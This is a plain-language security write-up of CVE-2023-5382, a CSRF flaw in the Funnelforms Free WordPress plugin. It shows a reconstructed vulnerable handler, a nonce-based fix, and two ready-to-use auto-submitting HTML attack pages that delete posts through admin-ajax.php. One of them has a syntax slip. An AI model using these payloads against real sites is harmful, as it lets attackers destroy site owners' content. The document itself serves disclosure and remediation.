CVE-2023-5382 - How a Simple CSRF Bug Could Let Attackers Delete Your WordPress Posts via Funnelforms Free

---

Summary:
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in the popular Funnelforms Free WordPress plugin, affecting versions up to and including 3.4. This security flaw, tracked as CVE-2023-5382, arises from missing or incorrect nonce validation in the plugin’s fnsf_delete_posts function. Exploiting this bug, attackers can trick logged-in site administrators into unknowingly deleting any post on the website.

This write-up will break down the vulnerability in layman's terms, show you code snippets, walk through a hypothetical attack, and provide useful links for reference and remediation.

What is Cross-Site Request Forgery (CSRF)?

CSRF is a type of security vulnerability where an attacker tricks a user (usually an admin) into performing actions they didn’t intend, like clicking a link or loading an image. If the site lacks proper protections (nonces or tokens), these actions carry the same authority as the logged-in user.

The Vulnerable Plugin

Funnelforms Free is a form builder plugin with over 10,000 active installations. Its versions up to 3.4 contain a CSRF vulnerability in the fnsf_delete_posts function.

Reference:
- Wordfence advisory on CVE-2023-5382

Here’s what the problematic function in Funnelforms might look like (simplified for clarity)

add_action('wp_ajax_fnsf_delete_posts', 'fnsf_delete_posts');

function fnsf_delete_posts() {
    // NONCE VERIFY IS MISSING HERE!
    $post_id = intval($_POST['post_id']);
    if (current_user_can('delete_posts')) {
        wp_delete_post($post_id, true);
        echo 'deleted';
    } else {
        echo 'permission denied';
    }
    wp_die();
}

What's Missing?

The function does not check if the request is genuine; there’s no WordPress nonce validation. This opens the door for attackers.

How Can Attackers Exploit This?

An attacker creates a malicious site. If an authenticated admin visits that site (while being logged into their WordPress dashboard), a forged request gets sent to the fnsf_delete_posts AJAX action.

The attacker can craft a hidden HTML form, or even a simple <img> tag, sending a POST request like

<form action="https://victim.com/wp-admin/admin-ajax.php"; method="POST" style="display:none;">
  <input type="hidden" name="action" value="fnsf_delete_posts" />
  <input type="hidden" name="post_id" value="123" />
  <input type="submit" />
</form>
<script>
  document.forms[].submit();
</script>

When an administrator visits the malicious page, their browser sends the request, instructing WordPress to delete post ID 123 (or any arbitrary post ID, including crucial pages or posts).

Admin logs into their WordPress site and stays authenticated.

2. Attacker sends the admin a link to a crafted website or includes the request in an image, email, or ad.
3. Admin visits the malicious site, unknowingly making their browser send the exploit request to the WordPress AJAX endpoint.
4. WordPress deletes the specified post because the fnsf_delete_posts function lacks any kind of nonce or origin check.

Why Nonces Matter

WordPress nonces ("numbers used once") are security tokens designed to validate requests and prevent CSRF. By requiring a nonce in sensitive operations, WordPress ensures that only legitimate users, performing valid actions, can trigger changes.

Properly secured code

function fnsf_delete_posts() {
    // Add nonce check to prevent CSRF
    if (!isset($_POST['_wpnonce']) || !wp_verify_nonce($_POST['_wpnonce'], 'fnsf_delete_posts_action')) {
        wp_die('Nonce check failed');
    }
    $post_id = intval($_POST['post_id']);
    // Continue as before...
}

A Real-World Exploit Scenario

Let’s say your blog’s most important post is “How We Grew 100%.” An attacker could easily delete it by sending a forged request with that post ID.

The attacker’s malicious page

<html>
  <body>
    <form action="https://victim.com/wp-admin/admin-ajax.php"; method="POST" id="csrf-form" style="display:none;">
      <input type="hidden" name="action" value="fnsf_delete_posts" />
      <input type="hidden" name="post_id" value="456" />
    </form>
    <script>document.getElementById('csrf-form').submit();</script>
  </body>
</html>

Just one visit by an admin is enough. There’s no feedback or warning, making this attack very sneaky.

References & Further Reading

- CVE entry for CVE-2023-5382
- Plugin homepage
- Wordfence Threat Database: CVE-2023-5382
- Introduction to WordPress Nonces

For developers

- Always add nonce checks (wp_verify_nonce) to functions handling POST/GET requests, especially those that make changes.

Check your site for deleted posts if you suspect your site’s been targeted; restore from backup if necessary.

Conclusion

CVE-2023-5382 highlights how a missing simple security check can put your entire website at risk. Stay aware, keep plugins updated, and make sure you follow WordPress security best practices—your content is worth it.


*This post is exclusive to this platform and written in plain language for easy understanding. Share to raise awareness!*

Timeline

Published on: 11/22/2023 16:15:11 UTC
Last modified on: 11/27/2023 20:11:42 UTC